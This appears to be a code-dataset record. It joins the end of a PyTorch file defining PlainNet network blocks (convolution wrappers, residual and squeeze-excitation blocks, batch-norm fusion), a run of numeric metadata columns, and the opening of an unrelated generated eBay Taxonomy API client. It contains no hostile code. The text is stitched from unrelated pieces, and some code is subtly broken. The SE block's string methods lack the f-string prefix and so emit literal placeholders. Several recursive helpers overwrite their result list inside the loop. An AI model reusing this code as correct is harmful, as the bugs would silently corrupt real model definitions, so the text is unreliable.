return self.in_channels * self.out_channels
def get_model_size(self):
return self.in_channels * self.out_channels + int(self.use_bias)
def set_in_channels(self, channels):
self.in_channels = channels
if not self.no_create:
self.netblock = nn.Linear(self.in_channels, self.out_channels,
bias=self.use_bias)
self.netblock.train()
self.netblock.requires_grad_(True)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert Linear.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('Linear('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
split_str = param_str.split(',')
in_channels = int(split_str[0])
out_channels = int(split_str[1])
use_bias = int(split_str[2])
return Linear(in_channels=in_channels, out_channels=out_channels, bias=use_bias == 1,
block_name=tmp_block_name, no_create=no_create), struct_str[idx + 1:]
class MaxPool(PlainNetBasicBlockClass):
"""maxpool layer"""
def __init__(self, out_channels, kernel_size, stride, no_create=False, **kwargs):
super().__init__(**kwargs)
self.in_channels = out_channels
self.out_channels = out_channels
self.kernel_size = kernel_size
self.stride = stride
self.padding = (kernel_size - 1) // 2
self.no_create = no_create
if not no_create:
self.netblock = nn.MaxPool2d(kernel_size=self.kernel_size, stride=self.stride, padding=self.padding)
def forward(self, input_):
return self.netblock(input_)
def __str__(self):
return f'MaxPool({self.out_channels},{self.kernel_size},{self.stride})'
def __repr__(self):
return f'MaxPool({self.block_name}|{self.out_channels},{self.kernel_size},{self.stride})'
def get_output_resolution(self, input_resolution):
return input_resolution // self.stride
def get_FLOPs(self, input_resolution):
return 0
def get_model_size(self):
return 0
def set_in_channels(self, channels):
self.in_channels = channels
self.out_channels = channels
if not self.no_create:
self.netblock = nn.MaxPool2d(kernel_size=self.kernel_size, stride=self.stride, padding=self.padding)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert MaxPool.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('MaxPool('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
param_str_split = param_str.split(',')
out_channels = int(param_str_split[0])
kernel_size = int(param_str_split[1])
stride = int(param_str_split[2])
return MaxPool(out_channels=out_channels, kernel_size=kernel_size, stride=stride, no_create=no_create,
block_name=tmp_block_name), struct_str[idx + 1:]
class Sequential(PlainNetBasicBlockClass):
"""sequential module"""
def __init__(self, block_list, no_create=False, **kwargs):
super().__init__(**kwargs)
self.block_list = block_list
if not no_create:
self.module_list = nn.ModuleList(block_list)
self.in_channels = block_list[0].in_channels
self.out_channels = block_list[-1].out_channels
self.no_create = no_create
res = 1024
for block in self.block_list:
res = block.get_output_resolution(res)
self.stride = 1024 // res
def forward(self, input_):
output = input_
for inner_block in self.block_list:
output = inner_block(output)
return output
def __str__(self):
block_str = 'Sequential('
for inner_block in self.block_list:
block_str += str(inner_block)
block_str += ')'
return block_str
def __repr__(self):
return str(self)
def get_output_resolution(self, input_resolution):
the_res = input_resolution
for the_block in self.block_list:
the_res = the_block.get_output_resolution(the_res)
return the_res
def get_FLOPs(self, input_resolution):
the_res = input_resolution
the_flops = 0
for the_block in self.block_list:
the_flops += the_block.get_FLOPs(the_res)
the_res = the_block.get_output_resolution(the_res)
return the_flops
def get_model_size(self):
the_size = 0
for the_block in self.block_list:
the_size += the_block.get_model_size()
return the_size
def set_in_channels(self, channels):
self.in_channels = channels
if len(self.block_list) == 0:
self.out_channels = channels
return
self.block_list[0].set_in_channels(channels)
last_channels = self.block_list[0].out_channels
if len(self.block_list) >= 2 and isinstance(self.block_list[1], BN):
self.block_list[1].set_in_channels(last_channels)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert Sequential.is_instance_from_str(struct_str)
the_right_paraen_idx = _get_right_parentheses_index_(struct_str)
param_str = struct_str[len('Sequential(') + 1:the_right_paraen_idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
assert len(remaining_s) == 0
if the_block_list is None or len(the_block_list) == 0:
return None, ''
return Sequential(block_list=the_block_list, no_create=no_create, block_name=tmp_block_name), ''
class MultiSumBlock(PlainNetBasicBlockClass):
"""multiple sum block"""
def __init__(self, block_list, no_create=False, **kwargs):
super().__init__(**kwargs)
self.block_list = block_list
if not no_create:
self.module_list = nn.ModuleList(block_list)
self.in_channels = np.max([x.in_channels for x in block_list])
self.out_channels = np.max([x.out_channels for x in block_list])
self.no_create = no_create
res = 1024
res = self.block_list[0].get_output_resolution(res)
self.stride = 1024 // res
def forward(self, input_):
output = self.block_list[0](input_)
for inner_block in self.block_list[1:]:
output2 = inner_block(input_)
output = output + output2
return output
def __str__(self):
block_str = f'MultiSumBlock({self.block_name}|'
for inner_block in self.block_list:
block_str += str(inner_block) + ';'
block_str = block_str[:-1]
block_str += ')'
return block_str
def __repr__(self):
return str(self)
def get_output_resolution(self, input_resolution):
the_res = self.block_list[0].get_output_resolution(input_resolution)
for the_block in self.block_list:
assert the_res == the_block.get_output_resolution(input_resolution)
return the_res
def get_FLOPs(self, input_resolution):
the_flops = 0
for the_block in self.block_list:
the_flops += the_block.get_FLOPs(input_resolution)
return the_flops
def get_model_size(self):
the_size = 0
for the_block in self.block_list:
the_size += the_block.get_model_size()
return the_size
def set_in_channels(self, channels):
self.in_channels = channels
for the_block in self.block_list:
the_block.set_in_channels(channels)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert MultiSumBlock.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('MultiSumBlock('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
the_s = param_str
the_block_list = []
while len(the_s) > 0:
tmp_block_list, remaining_s = _create_netblock_list_from_str_(the_s, no_create=no_create)
the_s = remaining_s
if tmp_block_list is None:
pass
elif len(tmp_block_list) == 1:
the_block_list.append(tmp_block_list[0])
else:
the_block_list.append(Sequential(block_list=tmp_block_list, no_create=no_create))
if len(the_block_list) == 0:
return None, struct_str[idx + 1:]
return MultiSumBlock(block_list=the_block_list, block_name=tmp_block_name,
no_create=no_create), struct_str[idx + 1:]
class MultiCatBlock(PlainNetBasicBlockClass):
"""multiple block concatenation"""
def __init__(self, block_list, no_create=False, **kwargs):
super().__init__(**kwargs)
self.block_list = block_list
if not no_create:
self.module_list = nn.ModuleList(block_list)
self.in_channels = np.max([x.in_channels for x in block_list])
self.out_channels = np.sum([x.out_channels for x in block_list])
self.no_create = no_create
res = 1024
res = self.block_list[0].get_output_resolution(res)
self.stride = 1024 // res
def forward(self, input_):
output_list = []
for inner_block in self.block_list:
output = inner_block(input_)
output_list.append(output)
return torch.cat(output_list, dim=1)
def __str__(self):
block_str = f'MultiCatBlock({self.block_name}|'
for inner_block in self.block_list:
block_str += str(inner_block) + ';'
block_str = block_str[:-1]
block_str += ')'
return block_str
def __repr__(self):
return str(self)
def get_output_resolution(self, input_resolution):
"""return single block's output size"""
the_res = self.block_list[0].get_output_resolution(input_resolution)
for the_block in self.block_list:
assert the_res == the_block.get_output_resolution(input_resolution)
return the_res
def get_FLOPs(self, input_resolution):
the_flops = 0
for the_block in self.block_list:
the_flops += the_block.get_FLOPs(input_resolution)
return the_flops
def get_model_size(self):
the_size = 0
for the_block in self.block_list:
the_size += the_block.get_model_size()
return the_size
def set_in_channels(self, channels):
self.in_channels = channels
for the_block in self.block_list:
the_block.set_in_channels(channels)
self.out_channels = np.sum([x.out_channels for x in self.block_list])
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert MultiCatBlock.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('MultiCatBlock('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
the_s = param_str
the_block_list = []
while len(the_s) > 0:
tmp_block_list, remaining_s = _create_netblock_list_from_str_(the_s, no_create=no_create)
the_s = remaining_s
if tmp_block_list is None:
pass
elif len(tmp_block_list) == 1:
the_block_list.append(tmp_block_list[0])
else:
the_block_list.append(Sequential(block_list=tmp_block_list, no_create=no_create))
if len(the_block_list) == 0:
return None, struct_str[idx + 1:]
return MultiCatBlock(block_list=the_block_list, block_name=tmp_block_name,
no_create=no_create), struct_str[idx + 1:]
class RELU(PlainNetBasicBlockClass):
"""RELU layer"""
def __init__(self, out_channels, no_create=False, **kwargs):
super().__init__(**kwargs)
self.in_channels = out_channels
self.out_channels = out_channels
self.no_create = no_create
def forward(self, input_):
return F.relu(input_)
def __str__(self):
return f'RELU({self.out_channels})'
def __repr__(self):
return f'RELU({self.block_name}|{self.out_channels})'
def get_output_resolution(self, input_resolution):
return input_resolution
def get_FLOPs(self, input_resolution):
return 0
def get_model_size(self):
return 0
def set_in_channels(self, channels):
self.in_channels = channels
self.out_channels = channels
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert RELU.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('RELU('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
out_channels = int(param_str)
return RELU(out_channels=out_channels, no_create=no_create, block_name=tmp_block_name), struct_str[idx + 1:]
class ResBlock(PlainNetBasicBlockClass):
"""ResBlock(in_channles, inner_blocks_str). If in_channels is missing, use block_list[0].in_channels as in_channels
"""
def __init__(self, block_list, in_channels=None, stride=None, no_create=False, **kwargs):
super().__init__(**kwargs)
self.block_list = block_list
self.stride = stride
self.no_create = no_create
if not no_create:
self.module_list = nn.ModuleList(block_list)
if in_channels is None:
self.in_channels = block_list[0].in_channels
else:
self.in_channels = in_channels
self.out_channels = block_list[-1].out_channels
if self.stride is None:
tmp_input_res = 1024
tmp_output_res = self.get_output_resolution(tmp_input_res)
self.stride = tmp_input_res // tmp_output_res
self.proj = None
if self.stride > 1 or self.in_channels != self.out_channels:
self.proj = nn.Sequential(
nn.Conv2d(self.in_channels, self.out_channels, 1, self.stride),
nn.BatchNorm2d(self.out_channels),
)
def forward(self, input_):
if len(self.block_list) == 0:
return input_
output = input_
for inner_block in self.block_list:
output = inner_block(output)
if self.proj is not None:
output = output + self.proj(input_)
else:
output = output + input_
return output
def __str__(self):
block_str = f'ResBlock({self.in_channels},{self.stride},'
for inner_block in self.block_list:
block_str += str(inner_block)
block_str += ')'
return block_str
def __repr__(self):
block_str = f'ResBlock({self.block_name}|{self.in_channels},{self.stride},'
for inner_block in self.block_list:
block_str += str(inner_block)
block_str += ')'
return block_str
def get_output_resolution(self, input_resolution):
the_res = input_resolution
for the_block in self.block_list:
the_res = the_block.get_output_resolution(the_res)
return the_res
def get_FLOPs(self, input_resolution):
the_res = input_resolution
the_flops = 0
for the_block in self.block_list:
the_flops += the_block.get_FLOPs(the_res)
the_res = the_block.get_output_resolution(the_res)
if self.proj is not None:
the_flops += self.in_channels * self.out_channels * (the_res / self.stride) ** 2 + \
(the_res / self.stride) ** 2 * self.out_channels
return the_flops
def get_model_size(self):
the_size = 0
for the_block in self.block_list:
the_size += the_block.get_model_size()
if self.proj is not None:
the_size += self.in_channels * self.out_channels + self.out_channels
return the_size
def set_in_channels(self, channels):
self.in_channels = channels
if len(self.block_list) == 0:
self.out_channels = channels
return
self.block_list[0].set_in_channels(channels)
last_channels = self.block_list[0].out_channels
if len(self.block_list) >= 2 and \
(isinstance(self.block_list[0], (ConvKX, ConvDW))) and isinstance(self.block_list[1], BN):
self.block_list[1].set_in_channels(last_channels)
self.proj = None
if not self.no_create:
if self.stride > 1 or self.in_channels != self.out_channels:
self.proj = nn.Sequential(
nn.Conv2d(self.in_channels, self.out_channels, 1, self.stride),
nn.BatchNorm2d(self.out_channels),
)
self.proj.train()
self.proj.requires_grad_(True)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert ResBlock.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
the_stride = None
param_str = struct_str[len('ResBlock('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
first_comma_index = param_str.find(',')
# cannot parse in_channels, missing, use default
if first_comma_index < 0 or not param_str[0:first_comma_index].isdigit():
in_channels = None
the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
else:
in_channels = int(param_str[0:first_comma_index])
param_str = param_str[first_comma_index + 1:]
second_comma_index = param_str.find(',')
if second_comma_index < 0 or not param_str[0:second_comma_index].isdigit():
the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
else:
the_stride = int(param_str[0:second_comma_index])
param_str = param_str[second_comma_index + 1:]
the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
assert len(remaining_s) == 0
if the_block_list is None or len(the_block_list) == 0:
return None, struct_str[idx + 1:]
return ResBlock(block_list=the_block_list, in_channels=in_channels,
stride=the_stride, no_create=no_create, block_name=tmp_block_name), struct_str[idx + 1:]
class ResBlockProj(PlainNetBasicBlockClass):
"""ResBlockProj(in_channles, inner_blocks_str). If in_channels is missing,
use block_list[0].in_channels as in_channels
"""
def __init__(self, block_list, in_channels=None, stride=None, no_create=False, **kwargs):
super().__init__(**kwargs)
self.block_list = block_list
self.stride = stride
self.no_create = no_create
if not no_create:
self.module_list = nn.ModuleList(block_list)
if in_channels is None:
self.in_channels = block_list[0].in_channels
else:
self.in_channels = in_channels
self.out_channels = block_list[-1].out_channels
if self.stride is None:
tmp_input_res = 1024
tmp_output_res = self.get_output_resolution(tmp_input_res)
self.stride = tmp_input_res // tmp_output_res
self.proj = nn.Sequential(
nn.Conv2d(self.in_channels, self.out_channels, 1, self.stride),
nn.BatchNorm2d(self.out_channels),)
def forward(self, input_):
if len(self.block_list) == 0:
return input_
output = input_
for inner_block in self.block_list:
output = inner_block(output)
output = output + self.proj(input_)
return output
def __str__(self):
block_str = f'ResBlockProj({self.in_channels},{self.stride},'
for inner_block in self.block_list:
block_str += str(inner_block)
block_str += ')'
return block_str
def __repr__(self):
block_str = f'ResBlockProj({self.block_name}|{self.in_channels},{self.stride},'
for inner_block in self.block_list:
block_str += str(inner_block)
block_str += ')'
return block_str
def get_output_resolution(self, input_resolution):
the_res = input_resolution
for the_block in self.block_list:
the_res = the_block.get_output_resolution(the_res)
return the_res
def get_FLOPs(self, input_resolution):
the_res = input_resolution
the_flops = 0
for the_block in self.block_list:
the_flops += the_block.get_FLOPs(the_res)
the_res = the_block.get_output_resolution(the_res)
if self.proj is not None:
the_flops += self.in_channels * self.out_channels * (the_res / self.stride) ** 2 + \
(the_res / self.stride) ** 2 * self.out_channels
return the_flops
def get_model_size(self):
the_size = 0
for the_block in self.block_list:
the_size += the_block.get_model_size()
if self.proj is not None:
the_size += self.in_channels * self.out_channels + self.out_channels
return the_size
def set_in_channels(self, channels):
self.in_channels = channels
if len(self.block_list) == 0:
self.out_channels = channels
return
self.block_list[0].set_in_channels(channels)
last_channels = self.block_list[0].out_channels
if len(self.block_list) >= 2 and \
(isinstance(self.block_list[0], (ConvKX, ConvDW))) and isinstance(self.block_list[1], BN):
self.block_list[1].set_in_channels(last_channels)
self.proj = None
if not self.no_create:
if self.stride > 1 or self.in_channels != self.out_channels:
self.proj = nn.Sequential(
nn.Conv2d(self.in_channels, self.out_channels, 1, self.stride),
nn.BatchNorm2d(self.out_channels),
)
self.proj.train()
self.proj.requires_grad_(True)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert ResBlockProj.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
the_stride = None
param_str = struct_str[len('ResBlockProj('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
first_comma_index = param_str.find(',')
# cannot parse in_channels, missing, use default
if first_comma_index < 0 or not param_str[0:first_comma_index].isdigit():
in_channels = None
the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
else:
in_channels = int(param_str[0:first_comma_index])
param_str = param_str[first_comma_index + 1:]
second_comma_index = param_str.find(',')
if second_comma_index < 0 or not param_str[0:second_comma_index].isdigit():
the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
else:
the_stride = int(param_str[0:second_comma_index])
param_str = param_str[second_comma_index + 1:]
the_block_list, remaining_s = _create_netblock_list_from_str_(param_str, no_create=no_create)
assert len(remaining_s) == 0
if the_block_list is None or len(the_block_list) == 0:
return None, struct_str[idx + 1:]
return ResBlockProj(block_list=the_block_list, in_channels=in_channels,
stride=the_stride, no_create=no_create, block_name=tmp_block_name), struct_str[idx + 1:]
class SE(PlainNetBasicBlockClass):
"""Squeeze and Excitation"""
def __init__(self, out_channels=None, copy_from=None,
no_create=False, **kwargs):
super().__init__(**kwargs)
self.no_create = no_create
if copy_from is not None:
raise RuntimeError('Not implemented')
self.in_channels = out_channels
self.out_channels = out_channels
self.se_ratio = 0.25
self.se_channels = max(1, int(round(self.out_channels * self.se_ratio)))
if no_create or self.out_channels == 0:
return
self.netblock = nn.Sequential(
nn.AdaptiveAvgPool2d((1, 1)),
nn.Conv2d(in_channels=self.out_channels, out_channels=self.se_channels, kernel_size=1, stride=1,
padding=0, bias=False),
nn.BatchNorm2d(self.se_channels),
nn.ReLU(),
nn.Conv2d(in_channels=self.se_channels, out_channels=self.out_channels, kernel_size=1, stride=1,
padding=0, bias=False),
nn.BatchNorm2d(self.out_channels),
nn.Sigmoid()
)
def forward(self, input_):
se_x = self.netblock(input_)
return se_x * input_
def __str__(self):
return 'SE({self.out_channels})'
def __repr__(self):
return 'SE({self.block_name}|{self.out_channels})'
def get_output_resolution(self, input_resolution):
return input_resolution
def get_FLOPs(self, input_resolution):
return self.in_channels * self.se_channels + self.se_channels * self.out_channels + self.out_channels + \
self.out_channels * input_resolution ** 2
def get_model_size(self):
return self.in_channels * self.se_channels + 2 * self.se_channels + self.se_channels * self.out_channels + \
2 * self.out_channels
def set_in_channels(self, channels):
self.in_channels = channels
if not self.no_create:
self.netblock = nn.Sequential(
nn.AdaptiveAvgPool2d((1, 1)),
nn.Conv2d(in_channels=self.out_channels, out_channels=self.se_channels, kernel_size=1, stride=1,
padding=0, bias=False),
nn.BatchNorm2d(self.se_channels),
nn.ReLU(),
nn.Conv2d(in_channels=self.se_channels, out_channels=self.out_channels, kernel_size=1, stride=1,
padding=0, bias=False),
nn.BatchNorm2d(self.out_channels),
nn.Sigmoid()
)
self.netblock.train()
self.netblock.requires_grad_(True)
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert SE.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('SE('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
out_channels = int(param_str)
return SE(out_channels=out_channels, no_create=no_create, block_name=tmp_block_name), struct_str[idx + 1:]
# pylint: disable=arguments-differ,abstract-method
class SwishImplementation(torch.autograd.Function):
"""swish implementation"""
@staticmethod
def forward(ctx, i):
result = i * torch.sigmoid(i)
ctx.save_for_backward(i)
return result
@staticmethod
def backward(ctx, grad_output):
i = ctx.saved_variables[0]
sigmoid_i = torch.sigmoid(i)
return grad_output * (sigmoid_i * (1 + i * (1 - sigmoid_i)))
class Swish(PlainNetBasicBlockClass):
"""swish activation"""
def __init__(self, out_channels=None, copy_from=None,
no_create=False, **kwargs):
super().__init__(**kwargs)
self.no_create = no_create
if copy_from is not None:
raise RuntimeError('Not implemented')
self.in_channels = out_channels
self.out_channels = out_channels
def forward(self, input_):
return SwishImplementation.apply(input_)
def __str__(self):
return f'Swish({self.out_channels})'
def __repr__(self):
return f'Swish({self.block_name}|{self.out_channels})'
def get_output_resolution(self, input_resolution):
return input_resolution
def get_FLOPs(self, input_resolution):
return self.out_channels * input_resolution ** 2
def get_model_size(self):
return 0
def set_in_channels(self, channels):
self.in_channels = channels
self.out_channels = channels
@classmethod
def create_from_str(cls, struct_str, no_create=False, **kwargs):
assert Swish.is_instance_from_str(struct_str)
idx = _get_right_parentheses_index_(struct_str)
assert idx is not None
param_str = struct_str[len('Swish('):idx]
# find block_name
tmp_idx = param_str.find('|')
if tmp_idx < 0:
tmp_block_name = f'uuid{uuid.uuid4().hex}'
else:
tmp_block_name = param_str[0:tmp_idx]
param_str = param_str[tmp_idx + 1:]
out_channels = int(param_str)
return Swish(out_channels=out_channels, no_create=no_create, block_name=tmp_block_name), struct_str[idx + 1:]
def _add_bn_layer_(block_list):
"""add bn layer to all blocks in block_list"""
new_block_list = []
for the_block in block_list:
if isinstance(the_block, (ConvKX, ConvDW)):
out_channels = the_block.out_channels
new_bn_block = BN(out_channels=out_channels, no_create=True)
new_seq_with_bn = Sequential(block_list=[the_block, new_bn_block], no_create=True)
new_block_list.append(new_seq_with_bn)
elif hasattr(the_block, 'block_list'):
new_block_list = _add_bn_layer_(the_block.block_list)
the_block.module_list = nn.ModuleList(new_block_list)
the_block.block_list = new_block_list
new_block_list.append(the_block)
else:
new_block_list.append(the_block)
return new_block_list
def _remove_bn_layer_(block_list):
"""remove bn layer from all blocks in block_list"""
new_block_list = []
for the_block in block_list:
if isinstance(the_block, BN):
continue
if hasattr(the_block, 'block_list'):
new_block_list = _remove_bn_layer_(the_block.block_list)
the_block.module_list = nn.ModuleList(new_block_list)
the_block.block_list = new_block_list
new_block_list.append(the_block)
else:
new_block_list.append(the_block)
return new_block_list
def _add_se_layer_(block_list):
"""add se layer to all blocks in block_list"""
new_block_list = []
for the_block in block_list:
if isinstance(the_block, RELU):
out_channels = the_block.out_channels
new_se_block = SE(out_channels=out_channels, no_create=True)
new_seq_with_bn = Sequential(block_list=[the_block, new_se_block], no_create=True)
new_block_list.append(new_seq_with_bn)
elif hasattr(the_block, 'block_list'):
new_block_list = _add_se_layer_(the_block.block_list)
the_block.module_list = nn.ModuleList(new_block_list)
the_block.block_list = new_block_list
new_block_list.append(the_block)
else:
new_block_list.append(the_block)
return new_block_list
def _replace_relu_with_swish_layer_(block_list):
"""replace all relu with swish in all blocks"""
new_block_list = []
for the_block in block_list:
if isinstance(the_block, RELU):
out_channels = the_block.out_channels
new_swish_block = Swish(out_channels=out_channels, no_create=True)
new_block_list.append(new_swish_block)
elif hasattr(the_block, 'block_list'):
new_block_list = _replace_relu_with_swish_layer_(the_block.block_list)
the_block.module_list = nn.ModuleList(new_block_list)
the_block.block_list = new_block_list
new_block_list.append(the_block)
else:
new_block_list.append(the_block)
return new_block_list
def _fuse_convkx_and_bn_(convkx, batch_norm):
"""fuse conv and bn layer"""
the_weight_scale = batch_norm.weight / torch.sqrt(batch_norm.running_var + batch_norm.eps)
convkx.weight[:] = convkx.weight * the_weight_scale.view((-1, 1, 1, 1))
the_bias_shift = (batch_norm.weight * batch_norm.running_mean) / \
torch.sqrt(batch_norm.running_var + batch_norm.eps)
batch_norm.weight[:] = 1
batch_norm.bias[:] = batch_norm.bias - the_bias_shift
batch_norm.running_var[:] = 1.0 - batch_norm.eps
batch_norm.running_mean[:] = 0.0
def _fuse_bn_layer_for_blocks_list_(block_list):
"""apply fuse operation to all blocks"""
last_block = None # type: ConvKX
with torch.no_grad():
for the_block in block_list:
if isinstance(the_block, BN):
# assert isinstance(last_block, ConvKX) or isinstance(last_block, ConvDW)
if isinstance(last_block, (ConvKX, ConvDW)):
_fuse_convkx_and_bn_(last_block.netblock, the_block.netblock)
else:
print(f'--- warning! Cannot fuse BN={the_block} because last_block={last_block}')
last_block = None
elif isinstance(the_block, (ConvKX, ConvDW)):
last_block = the_block
elif hasattr(the_block, 'block_list') and the_block.block_list is not None and \
len(the_block.block_list) > 0:
_fuse_bn_layer_for_blocks_list_(the_block.block_list)
else:
pass
def register_netblocks_dict(netblocks_dict: dict):
"""add all basic layer classes to dict"""
this_py_file_netblocks_dict = {
'AdaptiveAvgPool': AdaptiveAvgPool,
'BN': BN,
'ConvDW': ConvDW,
'ConvKX': ConvKX,
'ConvKXG2': ConvKXG2,
'ConvKXG4': ConvKXG4,
'ConvKXG8': ConvKXG8,
'ConvKXG16': ConvKXG16,
'ConvKXG32': ConvKXG32,
'Flatten': Flatten,
'Linear': Linear,
'MaxPool': MaxPool,
'MultiSumBlock': MultiSumBlock,
'MultiCatBlock': MultiCatBlock,
'PlainNetBasicBlockClass': PlainNetBasicBlockClass,
'RELU': RELU,
'ResBlock': ResBlock,
'ResBlockProj': ResBlockProj,
'Sequential': Sequential,
'SE': SE,
'Swish': Swish,
}
netblocks_dict.update(this_py_file_netblocks_dict)
return netblocks_dict
| 37.20013
| 119
| 0.63503
| 7,450
| 57,065
| 4.498121
| 0.033691
| 0.074185
| 0.052371
| 0.045299
| 0.877622
| 0.851332
| 0.835785
| 0.819791
| 0.805109
| 0.78983
| 0
| 0.009412
| 0.270131
| 57,065
| 1,533
| 120
| 37.224397
| 0.795174
| 0.031858
| 0
| 0.762799
| 0
| 0
| 0.040367
| 0.029675
| 0
| 0
| 0
| 0
| 0.044369
| 1
| 0.135666
| false
| 0.00256
| 0.008532
| 0.053754
| 0.274744
| 0.001706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
da8f063f9f138fe03610d7600654dcdc0b4fabc2
| 59,783
|
py
|
Python
|
src/ebay_rest/api/commerce_taxonomy/api/category_tree_api.py
|
gbm001/ebay_rest
|
077d3478423ccd80ff35e0361821d6a11180bc54
|
[
"MIT"
] | 3
|
2021-12-12T04:28:03.000Z
|
2022-03-10T03:29:18.000Z
|
src/ebay_rest/api/commerce_taxonomy/api/category_tree_api.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 33
|
2021-06-16T20:44:36.000Z
|
2022-03-30T14:55:06.000Z
|
src/ebay_rest/api/commerce_taxonomy/api/category_tree_api.py
|
jdavv/ebay_rest
|
20fc88c6aefdae9ab90f9c1330e79abddcd750cd
|
[
"MIT"
] | 7
|
2021-06-03T09:30:23.000Z
|
2022-03-08T19:51:33.000Z
|
# coding: utf-8
"""
Taxonomy API
Use the Taxonomy API to discover the most appropriate eBay categories under which sellers can offer inventory items for sale, and the most likely categories under which buyers can browse or search for items to purchase. In addition, the Taxonomy API provides metadata about the required and recommended category aspects to include in listings, and also has two operations to retrieve parts compatibility information. # noqa: E501
OpenAPI spec version: v1.0.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from ...commerce_taxonomy.api_client import ApiClient
class CategoryTreeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def fetch_item_aspects(self, category_tree_id, **kwargs): # noqa: E501
"""Get Aspects for All Leaf Categories in a Marketplace # noqa: E501
This call returns a complete list of aspects for all of the leaf categories that belong to an eBay marketplace. The eBay marketplace is specified through the category_tree_id URI parameter. Note: This call can return a large payload, so the call returns the response as a gzipped JSON file. The open source Taxonomy SDK can be used to compare the aspect metadata that is returned in this response. The bulk download capability that this method provides, when combined with the Taxonomy SDK, brings transparency to the evolution of the metadata. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.fetch_item_aspects(category_tree_id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str category_tree_id: The unique identifier of the eBay category tree being requested. (required)
:return: GetCategoriesAspectResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.fetch_item_aspects_with_http_info(category_tree_id, **kwargs) # noqa: E501
else:
(data) = self.fetch_item_aspects_with_http_info(category_tree_id, **kwargs) # noqa: E501
return data
def fetch_item_aspects_with_http_info(self, category_tree_id, **kwargs): # noqa: E501
"""Get Aspects for All Leaf Categories in a Marketplace # noqa: E501
